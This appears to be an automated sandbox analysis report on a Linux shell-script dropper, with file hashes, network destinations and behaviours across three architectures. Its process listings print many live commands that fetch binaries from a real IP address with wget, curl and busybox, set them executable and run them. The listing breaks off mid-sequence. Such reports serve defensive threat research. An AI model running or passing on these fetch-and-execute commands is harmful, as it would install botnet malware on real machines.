Analysis Overview
SHA256
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
Threat Level: Shows suspicious behavior
The file 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:17
Reported
2024-10-25 01:20
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
28s
Max time network
132s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
Processes
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.21:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
Files
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:17
Reported
2024-10-25 01:19
Platform
debian9-armhf-20240418-en
Max time kernel
32s
Max time network
33s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
Processes
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/747-1-0xb6726000-0xb6737044-memory.dmp
memory/786-2-0xb6728000-0xb6739044-memory.dmp
memory/859-3-0xb675a000-0xb676b044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:17
Reported
2024-10-25 01:20
Platform
debian9-mipsbe-20240611-en
Max time kernel
84s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
Processes
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
